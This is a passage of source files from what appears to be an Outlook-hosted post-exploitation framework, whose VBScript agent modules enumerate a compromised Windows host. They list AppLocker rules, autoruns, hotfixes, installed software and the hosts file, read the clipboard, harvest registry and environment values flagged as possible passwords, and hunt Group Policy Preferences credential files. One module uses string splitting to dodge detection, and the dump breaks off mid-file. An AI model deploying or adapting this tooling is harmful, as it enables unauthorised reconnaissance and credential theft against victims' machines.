"functions/enumerate/host/list_applocker.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the status of AppLocker. \n It returns one of the following statuses:\n - Not Enabled\n - Auditing\n - Enforced \n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumKey\n - ConnectServer(root\\cimv2).GetDwordValue\n - ConnectServer(root\\cimv2).GetStringValue\n\n \"\"\"\n self.entry = 'list_applocker'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_applocker.txt", "content": "Function list_applocker()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objReg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\t\r\n\tALlog = \"Enumerate AppLocker status:\" & vbCrLf\r\n\tKeyPathAL = \"Software\\Policies\\Microsoft\\Windows\\SrpV2\\\" \r\n\tresults = objReg.EnumKey(2147483650, KeyPathAL, arrSubkeysAL)\r\n\tIf results <> 0 Then\r\n\t\tALlog = ALlog & \"AppLocker disabled!\"\r\n\t\tlist_applocker = ALlog\r\n\tElse\r\n\t\tALlog = ALlog & \"AppLocker enabled!\" & vbCrlf\r\n\t\tFor Each strSubkeyAL In arrSubkeysAL\r\n\t\t\tstatus = objReg.GetDwordValue(2147483650, KeyPathAL & strSubkeyAL, \"EnforcementMode\", sectionMode)\r\n\t\t\tIf status <> 0 Then\r\n\t\t\t\tval = \"Not Enabled\"\r\n\t\t\tElse\r\n\t\t\t\tIf sectionMode = 1 Then\r\n\t\t\t\t\tval = \"Enforced\"\r\n\t\t\t\tElseIf sectionMode = 0 Then\r\n\t\t\t\t\tval = \"Auditing\"\r\n\t\t\t\tEnd If\r\n\t\t\t\tresul = objReg.EnumKey(2147483650, KeyPathAL & strSubKeyAL, arrSectionSub)\r\n\t\t\t\tAppLockerRules = AppLockerRules & \"AppLocker Rule section: \" & strSubKeyAL & vbCrlf\r\n\t\t\t\tFor Each strSub in arrSectionSub\r\n\t\t\t\t\t\tres = objReg.GetStringValue(2147483650, KeyPathAL & strSubKeyAL & \"\\\" & strSub, \"Value\", outrules)\r\n\t\t\t\t\t\tAppLockerRules = AppLockerRules & outrules & vbCrlf\t\t\t\r\n\t\t\t\tNext\r\n\t\t\tEnd If\r\n\t\t\tALlog = ALlog & \"EnforcementMode for \" & strSubKeyAl & \" Is \" & val & vbCrlf\r\n\t\tNext\r\n\t\tlist_applocker = ALlog & vbCrlf & AppLockerRules\r\n\tEnd If \r\nEnd Function" }, { "path": "functions/enumerate/host/list_autoruns.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates autoruns defined on the agent\n\n It uses WbemScripting.SWbemNamedValueSet\n - Add\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumValues\n - ConnectServer(root\\cimv2).GetDwordValue\n - ConnectServer(root\\cimv2).GetStringValue\n - ConnectServer(root\\cimv2).GetExpandedStringValue\n - ConnectServer(root\\cimv2).GetBinaryValue\n - ConnectServer(root\\cimv2).GetMultiStringValue\n - ConnectServer(root\\cimv2).GetQWORDValue\n\n It uses Scripting.FileSystemObject\n - GetFolder\n - GetFolder().Files\n - GetBaseName\n - GetExtensionName\n \"\"\"\n self.entry = 'list_autoruns'\n self.depends = ['./helperFunctions/Getallregvalues.txt', './helperFunctions/Getregvalue.txt', './helperFunctions/dir_lister.txt']\n self.options['username'] = {\n \"value\": \"Dummy\",\n \"required\": True,\n \"description\": \"Username, autoresolves to agents registered username\",\n \"handler\": quotedstring,\n \"hidden\": False\n }\n super().__init__(templatepath)\n \n def preprocess(self, agent):\n self.options['username']['value'] = agent.username" }, { "path": "functions/enumerate/host/list_autoruns.txt", "content": "Function list_autoruns()\r\n\tOn error resume next\r\n\tlist_autoruns = \"HKCU Autoruns:\" & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\run\", 64, 2147483649)\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\runonce\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKCU\", \"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\", 64, 2147483649) & vbCrLf\r\n\tlist_autoruns = list_autoruns & vbCrLf\r\n \r\n 'HKLM\r\n\tlist_autoruns = list_autoruns & \"HKLM Autoruns:\" & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\", 64, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\", 32, 2147483650) & vbCrLf\r\n list_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\", 64, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\", 32, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\", 64, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\", 32, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\", 64, 2147483650) & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\", 64, 2147483650) & vbCrLf\r\n list_autoruns = list_autoruns & GetAllRegValues(\"HKLM\", \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\", 64, 2147483650) & vbCrLf\r\n\t\r\n\tlist_autoruns = list_autoruns & GetRegValue(\"HKLM\", \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\", \"Notify\", 64, 2147483650, \"STDREGPROV\") & vbCrLf & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetRegValue(\"HKLM\", \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Userinit\", \"Notify\", 64, 2147483650, \"STDREGPROV\") & vbCrLf & vbCrLf\r\n list_autoruns = list_autoruns & GetRegValue(\"HKLM\", \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Shell\", \"Notify\", 64, 2147483650, \"STDREGPROV\") & vbCrLf & vbCrLf\r\n\tlist_autoruns = list_autoruns & GetRegValue(\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\", \"WebCheck\", 64, 2147483650, \"STDREGPROV\") & vbCrLf & vbCrLf\r\n list_autoruns = list_autoruns & GetRegValue(\"HKLM\", \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\", \"AppInit_DLLs\", 64, 2147483650, \"STDREGPROV\") & vbCrLf & vbCrLf\r\n\r\n\t'Files\r\n\tlist_autoruns = list_autoruns & \"FILE Autoruns:\" & vbCrLf\r\n\tlist_autoruns = list_autoruns & dir_lister(\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\", 0, False, \"*\", \"*\", True, \"mb\") & vbCrLf\r\n\tlist_autoruns = list_autoruns & dir_lister(\"C:\\Users\\\" & {{username}} & \"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\", 0, False, \"*\", \"*\", True, \"mb\") & vbCrLf\r\nEnd Function" }, { "path": "functions/enumerate/host/list_basic.py", "content": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates basic details about the host. It retrieves:\n - %Computername%\n - %Username%\n - %Userdomain%\n - %Userprofile%\n - %Userdnsdomain%\n - %Logonserver%\n - %Homepath%\n\n It uses Wscript.Shell\n - ExpandEnvironmentStrings\n \"\"\"\n self.entry = 'list_basic'\n self.depends = []\n super().__init__(templatepath)\n\n def rethandler(self, agent, options, data):\n if (\"-VSTO\" not in agent.hostname): # Handle exception when VSTO agents are used\n agent.hostname = data.split()[3]\n agent.username = data.split()[1]\n\n" }, { "path": "functions/enumerate/host/list_basic.txt", "content": "Function list_basic()\r\n\tOn error resume next\r\n\tSet sh = window.external.OutlookApplication.CreateObject(\"Wsc\" & \"ript.Sh\" & \"ell\")\r\n\t\r\n\tgds = sh.ExpandEnvironmentStrings(\"%COMPUTERNAME%\")\r\n\thuj = sh.ExpandEnvironmentStrings(\"%USERNAME%\")\r\n\timd = sh.ExpandEnvironmentStrings(\"%USERDOMAIN%\")\r\n\tfvy = sh.ExpandEnvironmentStrings(\"%USERPROFILE%\")\r\n\tudd = sh.ExpandEnvironmentStrings(\"%USERDNSDOMAIN%\")\r\n\tfah = sh.ExpandEnvironmentStrings(\"%LOGONSERVER%\")\r\n\thyf = sh.ExpandEnvironmentStrings(\"%HOMEPATH%\")\r\n\t\r\n\tIf udd = \"%USERDNSDOMAIN%\" Then\r\n\t\tudd = \"WORKGROUP\"\r\n\tEnd If\r\n\t\r\n\tlist_basic = \"UserName: \" & huj & vbCrLf & \"ComputerName: \" & gds & vbCrLf & \"UserDomain: \" & imd & vbCrLF & \"UserDNSDomain: \" & udd & vbCrLF & \"Logon server: \" & fah & vbCrLF & \"Homepath: \" & hyf & vbCrLF & \"UserProfile: \" & fvy & vbCrLF & vbCrLf\r\nEnd Function" }, { "path": "functions/enumerate/host/list_boottime.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates last boot time using WMI. \n It queries LastBootUpTime from Win32_OperatingSystem and converts it to a readable format.\n\n It uses WbemScripting.SWbemLocator\n - Query: Select LastBootUpTime from Win32_OperatingSystem\n \"\"\"\n self.entry = 'list_boottime'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_boottime.txt", "content": "Function list_boottime()\r\n On error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n Set objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n Set col = objWMIService.ExecQuery (\"Select LastBootUpTime from Win32_OperatingSystem\")\r\n\r\n For Each obj in col\r\n list_boottime = obj.LastBootUpTime\r\n Next\r\n\tlist_boottime = ( Left(list_boottime, 4) _\r\n & \"/\" & Mid(list_boottime, 5, 2) _\r\n & \"/\" & Mid(list_boottime, 7, 2) _\r\n & \" \" & Mid(list_boottime, 9, 2) _\r\n & \":\" & Mid(list_boottime,11, 2) _\r\n & \":\" & Mid(list_boottime,13, 2))\r\n list_boottime = \"Last Boot time: \" & list_boottime\r\nEnd Function" }, { "path": "functions/enumerate/host/list_clipboard.py", "content": "from lib.core.specmodule import SpecModule\nfrom datetime import datetime\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Creates a html object and retrieved the content from the clipboard\n\n It uses htmlfile\n - ParentWindow.ClipboardData.GetData()\n \"\"\"\n self.entry = 'list_clipboard'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_clipboard.txt", "content": "Function list_clipboard()\r\n\tOn error resume next\r\n\tSet html = window.external.OutlookApplication.CreateObject(\"htmlfile\")\r\n\ttext = html.ParentWindow.ClipboardData.GetData(\"text\")\r\n\tlist_clipboard = \"Clipboard data retrieved: \" & vbCrLf & text\r\nEnd Function" }, { "path": "functions/enumerate/host/list_environmentvariables.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Lists interesting registry values that might be passwords \n or other interesting configuration settings\n\n It uses WbemScripting.SWbemNamedValueSet\n - Add\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumValues\n - ConnectServer(root\\cimv2).GetDwordValue\n - ConnectServer(root\\cimv2).GetStringValue\n - ConnectServer(root\\cimv2).GetExpandedStringValue\n - ConnectServer(root\\cimv2).GetBinaryValue\n - ConnectServer(root\\cimv2).GetMultiStringValue\n - ConnectServer(root\\cimv2).GetQWORDValue\n \"\"\"\n self.entry = 'list_environmentvariables'\n self.depends = ['./helperFunctions/Getallregvalues.txt']\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_environmentvariables.txt", "content": "Function list_environmentvariables()\r\n\tOn error resume next\r\n\tlist_environmentvariables = list_environmentvariables & GetAllRegValues(\"HKLM\", \"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\", 64, 2147483650) & vbCrLF & vbCrLF\r\n\tlist_environmentvariables = list_environmentvariables & GetAllRegValues(\"HKCU\", \"Environment\", 64, 2147483649) & vbCrLF & vbCrLF\r\n\tlist_environmentvariables = list_environmentvariables & GetAllRegValues(\"HKCU\", \"Volatile Environment\", 64, 2147483649) & vbCrLF\r\nEnd Function" }, { "path": "functions/enumerate/host/list_gpp.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.depends = ['./helperFunctions/dir_lister.txt']\n self.help = \"\"\"\n Lists Group Policy Preferences files local on host that could contain passwords, configurations or other data.\n It looks inside C:\\\\Windows\\\\System32\\\\GroupPolicy\\\\DataStore\\\\0\\\\sysvol\\\\domain.com\\\\Policies\\\\ on the local host for the following files\n Groups.xml\n Drives.xml\n Services.xml\n ScheduledTasks.xml\n Datasources.xml\n Printers.xml\n\n It uses Wscript.Shell\n - ExpandEnvironmentStrings\n \n It uses Scripting.FileSystemObject\n - FolderExists\n - GetFolder\n - GetFolder().Files\n - GetBaseName\n - GetExtensionName\n \"\"\"\n self.entry = 'list_gpp'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_gpp.txt", "content": "Function list_gpp()\n On error resume next\n Set sh = window.external.OutlookApplication.CreateObject(\"Wscript.Shell\")\n Set fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSystemObject\")\n dom = sh.ExpandEnvironmentStrings(\"%USERDNSDOMAIN%\")\n polpath = \"C:\\Windows\\sysnative\\GroupPolicy\\DataStore\\0\\sysvol\\\" & dom & \"\\Policies\\\"\n If fs.FolderExists(polpath) = True Then\n output = \"Found \" & \"C:\\Windows\\sysnative\\GroupPolicy\\DataStore\\0\\sysvol\\\" & dom & \"\\Policies\\\" & vbCrLf\n output = output & \"Searching for Groups.xml\" & vbCrLf & dir_lister(polpath, 0, 4, \"xml\", \"Groups\", True, \"mb\") & vbCrLf\n output = output & \"Searching for Drives.xml\" & vbCrLf &dir_lister(polpath, 0, 4, \"xml\", \"Drives\", True, \"mb\") & vbCrLf\n output = output & \"Searching for Services.xml\" & vbCrLf &dir_lister(polpath, 0, 4, \"xml\", \"Services\", True, \"mb\") & vbCrLf\n output = output & \"Searching for ScheduledTasks.xml\" & vbCrLf &dir_lister(polpath, 0, 4, \"xml\", \"ScheduledTasks\", True, \"mb\") & vbCrLf\n output = output & \"Searching for Datasources.xml\" & vbCrLf &dir_lister(polpath, 0, 4, \"xml\", \"Datasources\", True, \"mb\") & vbCrLf\n output = output & \"Searching for Printers.xml\" & vbCrLf &dir_lister(polpath, 0, 4, \"xml\", \"Printers\", True, \"mb\") & vbCrLf\n else\n output = \"Local Policy Folder not found at \" & polpath\n\tEnd If\n list_gpp = output\nEnd Function" }, { "path": "functions/enumerate/host/list_hostsfile.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n This module reads the content of the hostsfile under\n C:\\windows\\system32\\drivers\\etc\\hosts and outputs to the log. \n This might reveal specific hosts or other domains etc.\n\n It uses Scripting.FileSystemObject\n - OpenTextFile\n - OpenTextFile().ReadFile.ReadAll\n \"\"\"\n self.entry = 'list_hostsfile'\n self.depends = []\n super().__init__(templatepath)\n" }, { "path": "functions/enumerate/host/list_hostsfile.txt", "content": "Function list_hostsfile()\r\n\tOn error resume next\r\n\tSet fs = window.external.OutlookApplication.CreateObject(\"Scripting.FileSystemObject\")\r\n If fs.FileExists(\"C:\\Windows\\System32\\drivers\\etc\\hosts\") = True Then\r\n set ReadFile = fs.OpenTextFile(\"C:\\Windows\\System32\\drivers\\etc\\hosts\", 1)\r\n\t\tcontent = ReadFile.ReadAll\r\n\telse\r\n\t\tcontent = \"Hosts file not found - WTF!\"\r\n\tEnd If\r\n\tlist_hostsfile = \"C:\\Windows\\System32\\drivers\\etc\\hosts:\" & vbCrLf & content\r\nEnd Function" }, { "path": "functions/enumerate/host/list_hotfixes.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Using WMI it enumerates the installed hotfixes.\n The Win32_QuickFixEngineering is used (Same as the Powershell cmdlet get-hotfix)\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select * from Win32_QuickFixEngineering\n \"\"\"\n self.entry = 'list_hotfixes'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_hotfixes.txt", "content": "Function list_hotfixes()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet colItems = objWMIService.ExecQuery(\"Select * from Win32_QuickFixEngineering\",,48)\r\n\tlist_hotfixes = \"HotFixID - Description - InstalledOn\" & vbCrLf\r\n\tFor Each objItem in colItems\r\n\t\tlist_hotfixes = list_hotfixes & objItem.HotFixID & \" - \" & objItem.Description & \" - \" & objItem.InstalledOn & vbCrLf\r\n\tNext\r\nEnd Function" }, { "path": "functions/enumerate/host/list_installedapps.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the installed applications. \n It enumerates information from the \n HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\ \n &\n HKLM\\\\SOFTWARE\\\\wow6432node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\ \n registry keys.\n\n It uses WbemScripting.SWbemLocator\n - Add\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumKey\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_installedapps'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_installedapps.txt", "content": "Function list_installedapps()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tobjLocator.Add \"__ProviderArchitecture\", 64\r\n\tSet objReg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tKeyPathApps = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" \r\n\tobjReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps \r\n\tapps = \"Installed 64bits Applications:\" & vbCrLf\r\n\tFor Each strSubkeyapps In arrSubkeysapps\r\n\t\tobjReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, \"DisplayName\", appName\r\n\t\tIf appName <> \"\" Then \r\n\t\t\tobjReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, \"DisplayVersion\", Version\r\n\t\t\tapps = apps & appName & \" | \" & Version & vbCrLf\r\n\t\tEnd If \r\n\tNext \r\n\tapps = apps & vbCrLf & vbCrLf\r\n\r\n\tobjLocator.Add \"__ProviderArchitecture\", 32\r\n\tSet objReg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tKeyPathApps = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" \r\n\tobjReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps \r\n\tapps = apps & \"Installed 32bits Applications:\" & vbCrLf\r\n\tFor Each strSubkeyapps In arrSubkeysapps\r\n\t\tobjReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, \"DisplayName\", appName\r\n\t\tIf appName <> \"\" Then \r\n\t\t\tobjReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, \"DisplayVersion\", Version\r\n\t\t\tapps = apps & appName & \" | \" & Version & vbCrLf\r\n\t\tEnd If \r\n\tNext \r\n\tlist_installedapps = apps & vbCrLf\r\n\r\nEnd Function" }, { "path": "functions/enumerate/host/list_installeddotnet.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the installed .NET versions. \n Based on MS documentation: \n https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed\n\n Lists the installed versions\n\n It uses WbemScripting.SWbemNamedValueSet\n - Add\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumValues\n - ConnectServer(root\\cimv2).GetDwordValue\n - ConnectServer(root\\cimv2).GetStringValue\n - ConnectServer(root\\cimv2).GetExpandedStringValue\n - ConnectServer(root\\cimv2).GetBinaryValue\n - ConnectServer(root\\cimv2).GetMultiStringValue\n - ConnectServer(root\\cimv2).GetQWORDValue\n \"\"\"\n self.entry = 'list_installeddotnet'\n self.depends = ['./helperFunctions/Getregvalue.txt']\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_installeddotnet.txt", "content": "Function list_installeddotnet()\r\n\tOn error resume next\r\n\tlist_installeddotnet = \"INSTALLED .NET VERSIONS:\" & vbCrLf\r\n\tx64v1 = GetRegValue(\"HKLM\", \"Software\\Microsoft\\.NETFramework\\Policy\\v1.0\\3705\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v11 = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v1.1.4322\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v2 = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v2.3.50727\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v3 = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v3.0\\Setup\", \"InstallSuccess\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v35 = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v3.5\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v40C = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx64v40F = GetRegValue(\"HKLM\", \"Software\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\r\n\tx86v1 = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\.NETFramework\\Policy\\v1.0\\3705\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v11 = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v1.1.4322\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v2 = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v2.3.50727\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v3 = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v3.0\\Setup\", \"InstallSuccess\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v35 = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v3.5\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v40C = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v4\\Client\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\tx86v40F = GetRegValue(\"HKLM\", \"Software\\WOW6432Node\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\", \"Install\", 64, 2147483650, \"STDREGPROV\")\r\n\r\n\tif (inStr(1,x64v1,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v1.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x64v11,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v1.1 installed\" & vbCrLf\r\n\tend if\r\n\t\r\n\tif (inStr(1,x64v2,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v2.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x64v3,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v3.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x64v35,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v3.5 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x64v40C,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v4.0-Client installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x64v40F,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X64 .NET Framework v4.0-Full installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v1,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v1.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v11,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v1.1 installed\" & vbCrLf\r\n\tend if\r\n\t\r\n\tif (inStr(1,x86v2,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v2.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v3,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v3.0 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v35,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v3.5 installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v40C,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v4.0-Client installed\" & vbCrLf\r\n\tend if\r\n\r\n\tif (inStr(1,x86v40F,\"Path:\",1) = 1) then\r\n\t\tlist_installeddotnet = list_installeddotnet & \"X86 .NET Framework v4.0-Full installed\" & vbCrLf\r\n\tend if\r\n\r\nEnd Function" }, { "path": "functions/enumerate/host/list_installedpowershell.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the current installed PowerShell versions on the host using registry.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).EnumKey\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_installedpowershell'\n 